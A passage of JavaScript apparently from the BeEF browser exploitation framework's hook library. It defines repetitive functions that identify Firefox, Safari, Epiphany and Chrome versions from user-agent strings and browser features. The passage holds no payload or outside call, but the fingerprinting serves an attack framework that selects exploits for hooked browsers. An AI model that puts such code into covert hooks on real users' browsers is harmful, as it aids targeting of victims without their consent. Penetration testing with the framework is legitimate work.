return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/91./) != null;
},
/**
* Returns true if FF92
* @example: beef.browser.isFF92()
*/
isFF92: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/92./) != null;
},
/**
* Returns true if FF93
* @example: beef.browser.isFF93()
*/
isFF93: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/93./) != null;
},
/**
* Returns true if FF94
* @example: beef.browser.isFF94()
*/
isFF94: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/94./) != null;
},
/**
* Returns true if FF95
* @example: beef.browser.isFF95()
*/
isFF95: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/95./) != null;
},
/**
* Returns true if FF96
* @example: beef.browser.isFF96()
*/
isFF96: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/96./) != null;
},
/**
* Returns true if FF97
* @example: beef.browser.isFF97()
*/
isFF97: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/97./) != null;
},
/**
* Returns true if FF98
* @example: beef.browser.isFF98()
*/
isFF98: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/98./) != null;
},
/**
* Returns true if FF99
* @example: beef.browser.isFF99()
*/
isFF99: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
},
/**
* Returns true if Safari 4.xx
* @example: beef.browser.isS4()
*/
isS4: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/4/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari 5.xx
* @example: beef.browser.isS5()
*/
isS5: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/5/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari 6.xx
* @example: beef.browser.isS6()
*/
isS6: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/6/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari 7.xx
* @example: beef.browser.isS7()
*/
isS7: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/7/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari 8.xx
* @example: beef.browser.isS8()
*/
isS8: function () {
return (window.navigator.userAgent.match(/ Version\/\d/) != null && window.navigator.userAgent.match(/Safari\/8/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
},
/**
* Returns true if Safari.
* @example: beef.browser.isS()
*/
isS: function () {
return this.isS4() || this.isS5() || this.isS6() || this.isS7() || this.isS8();
},
/**
* Returns true if Webkit based
*/
isWebKitBased: function () {
/*
* **** DUPLICATE WARNING **** Changes here may aldo need addressed in /isS\d+/ functions.
*/
return (!window.opera && !window.chrome
&& window.navigator.userAgent.match(/ Version\/\d/) != null
&& !window.globalStorage
&& !!window.getComputedStyle
&& !("MozWebSocket" in window));
},
/**
* Return true if Epiphany
* @example: beef.browser.isEpi()
*/
isEpi: function () {
// Epiphany is based on webkit
// due to the uncertainty of webkit version vs Epiphany versions tracking.
// -- do webkit based checking (i.e. do safari checks)
return this.isWebKitBased() && window.navigator.userAgent.match(/Epiphany\//) != null;
},
/**
* Returns true if Chrome 5.
* @example: beef.browser.isC5()
*/
isC5: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false);
},
/**
* Returns true if Chrome 6.
* @example: beef.browser.isC6()
*/
isC6: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false);
},
/**
* Returns true if Chrome 7.
* @example: beef.browser.isC7()
*/
isC7: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false);
},
/**
* Returns true if Chrome 8.
* @example: beef.browser.isC8()
*/
isC8: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false);
},
/**
* Returns true if Chrome 9.
* @example: beef.browser.isC9()
*/
isC9: function () {
return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false);
},
/**
* Returns true if Chrome 10.
* @example: beef.browser.isC10()
*/
isC10: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false);
},
/**
* Returns true if Chrome 11.
* @example: beef.browser.isC11()
*/
isC11: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false);
},
/**
* Returns true if Chrome 12.
* @example: beef.browser.isC12()
*/
isC12: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false);
},
/**
* Returns true if Chrome 13.
* @example: beef.browser.isC13()
*/
isC13: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false);
},
/**
* Returns true if Chrome 14.
* @example: beef.browser.isC14()
*/
isC14: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false);
},
/**
* Returns true if Chrome 15.
* @example: beef.browser.isC15()
*/
isC15: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false);
},
/**
* Returns true if Chrome 16.
* @example: beef.browser.isC16()
*/
isC16: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false);
},
/**
* Returns true if Chrome 17.
* @example: beef.browser.isC17()
*/
isC17: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false);
},
/**
* Returns true if Chrome 18.
* @example: beef.browser.isC18()
*/
isC18: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false);
},
/**
* Returns true if Chrome 19.
* @example: beef.browser.isC19()
*/
isC19: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome for iOS 19.
* @example: beef.browser.isC19iOS()
*/
isC19iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
},
/**
* Returns true if Chrome 20.
* @example: beef.browser.isC20()
*/
isC20: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome for iOS 20.
* @example: beef.browser.isC20iOS()
*/
isC20iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
},
/**
* Returns true if Chrome 21.
* @example: beef.browser.isC21()
*/
isC21: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome for iOS 21.
* @example: beef.browser.isC21iOS()
*/
isC21iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
},
/**
* Returns true if Chrome 22.
* @example: beef.browser.isC22()
*/
isC22: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome for iOS 22.
* @example: beef.browser.isC22iOS()
*/
isC22iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
},
/**
* Returns true if Chrome 23.
* @example: beef.browser.isC23()
*/
isC23: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome for iOS 23.
* @example: beef.browser.isC23iOS()
*/
isC23iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
},
/**
* Returns true if Chrome 24.
* @example: beef.browser.isC24()
*/
isC24: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome for iOS 24.
* @example: beef.browser.isC24iOS()
*/
isC24iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
},
/**
* Returns true if Chrome 25.
* @example: beef.browser.isC25()
*/
isC25: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome for iOS 25.
* @example: beef.browser.isC25iOS()
*/
isC25iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
},
/**
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
*/
isC26: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome for iOS 26.
* @example: beef.browser.isC26iOS()
*/
isC26iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/**
* Returns true if Chrome 27.
* @example: beef.browser.isC27()
*/
isC27: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome for iOS 27.
* @example: beef.browser.isC27iOS()
*/
isC27iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
},
/**
* Returns true if Chrome 28.
* @example: beef.browser.isC28()
*/
isC28: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome for iOS 28.
* @example: beef.browser.isC28iOS()
*/
isC28iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
},
/**
* Returns true if Chrome 29.
* @example: beef.browser.isC29()
*/
isC29: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome for iOS 29.
* @example: beef.browser.isC29iOS()
*/
isC29iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 29) ? true : false);
},
/**
* Returns true if Chrome 30.
* @example: beef.browser.isC30()
*/
isC30: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome for iOS 30.
* @example: beef.browser.isC30iOS()
*/
isC30iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 30) ? true : false);
},
/**
* Returns true if Chrome 31.
* @example: beef.browser.isC31()
*/
isC31: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 31) ? true : false);
},
/**
* Returns true if Chrome for iOS 31.
* @example: beef.browser.isC31iOS()
*/
isC31iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 31) ? true : false);
},
/**
* Returns true if Chrome 32.
* @example: beef.browser.isC32()
*/
isC32: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 32) ? true : false);
},
/**
* Returns true if Chrome for iOS 32.
* @example: beef.browser.isC32iOS()
*/
isC32iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 32) ? true : false);
},
/**
* Returns true if Chrome 33.
* @example: beef.browser.isC33()
*/
isC33: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 33) ? true : false);
},
/**
* Returns true if Chrome for iOS 33.
* @example: beef.browser.isC33iOS()
*/
isC33iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 33) ? true : false);
},
/**
* Returns true if Chrome 34.
* @example: beef.browser.isC34()
*/
isC34: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 34) ? true : false);
},
/**
* Returns true if Chrome for iOS 34.
* @example: beef.browser.isC34iOS()
*/
isC34iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 34) ? true : false);
},
/**
* Returns true if Chrome 35.
* @example: beef.browser.isC35()
*/
isC35: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 35) ? true : false);
},
/**
* Returns true if Chrome for iOS 35.
* @example: beef.browser.isC35iOS()
*/
isC35iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 35) ? true : false);
},
/**
* Returns true if Chrome 36.
* @example: beef.browser.isC36()
*/
isC36: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 36) ? true : false);
},
/**
* Returns true if Chrome for iOS 36.
* @example: beef.browser.isC36iOS()
*/
isC36iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 36) ? true : false);
},
/**
* Returns true if Chrome 37.
* @example: beef.browser.isC37()
*/
isC37: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 37) ? true : false);
},
/**
* Returns true if Chrome for iOS 37.
* @example: beef.browser.isC37iOS()
*/
isC37iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 37) ? true : false);
},
/**
* Returns true if Chrome 38.
* @example: beef.browser.isC38()
*/
isC38: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 38) ? true : false);
},
/**
* Returns true if Chrome for iOS 38.
* @example: beef.browser.isC38iOS()
*/
isC38iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 38) ? true : false);
},
/**
* Returns true if Chrome 39.
* @example: beef.browser.isC39()
*/
isC39: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 39) ? true : false);
},
/**
* Returns true if Chrome for iOS 39.
* @example: beef.browser.isC39iOS()
*/
isC39iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
},
/**
* Returns true if Chrome 40.
* @example: beef.browser.isC40()
*/
isC40: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 40) ? true : false);
},
/**
* Returns true if Chrome for iOS 40.
* @example: beef.browser.isC40iOS()
*/
isC40iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 40) ? true : false);
},
/**
* Returns true if Chrome 41.
* @example: beef.browser.isC41()
*/
isC41: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 41) ? true : false);
},
/**
* Returns true if Chrome for iOS 41.
* @example: beef.browser.isC41iOS()
*/
isC41iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 41) ? true : false);
},
/**
* Returns true if Chrome 42.
* @example: beef.browser.isC42()
*/
isC42: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 42) ? true : false);
},
/**
* Returns true if Chrome for iOS 42.
* @example: beef.browser.isC42iOS()
*/
isC42iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 42) ? true : false);
},
/**
* Returns true if Chrome 43.
* @example: beef.browser.isC43()
*/
isC43: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 43) ? true : false);
},
/**
* Returns true if Chrome for iOS 43.
* @example: beef.browser.isC43iOS()
*/
isC43iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 43) ? true : false);
},
/**
* Returns true if Chrome 44.
* @example: beef.browser.isC44()
*/
isC44: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 44) ? true : false);
},
/**
* Returns true if Chrome for iOS 44.
* @example: beef.browser.isC44iOS()
*/
isC44iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 44) ? true : false);
},
/**
* Returns true if Chrome 45.
* @example: beef.browser.isC45()
*/
isC45: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 45) ? true : false);
},
/**
* Returns true if Chrome for iOS 45.
* @example: beef.browser.isC45iOS()
*/
isC45iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 45) ? true : false);
},
/**
* Returns true if Chrome 46.
* @example: beef.browser.isC46()
*/
isC46: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 46) ? true : false);
},
/**
* Returns true if Chrome for iOS 46.
* @example: beef.browser.isC46iOS()
*/
isC46iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 46) ? true : false);
},
/**
* Returns true if Chrome 47.
* @example: beef.browser.isC47()
*/
isC47: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 47) ? true : false);
},
/**
* Returns true if Chrome for iOS 47.
* @example: beef.browser.isC47iOS()
*/
isC47iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 47) ? true : false);
},
/**
* Returns true if Chrome 48.
* @example: beef.browser.isC48()
*/
isC48: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 48) ? true : false);
},
/**
* Returns true if Chrome for iOS 48.
* @example: beef.browser.isC48iOS()
*/
isC48iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 48) ? true : false);
},
/**
* Returns true if Chrome 49.
* @example: beef.browser.isC49()
*/
isC49: function () {
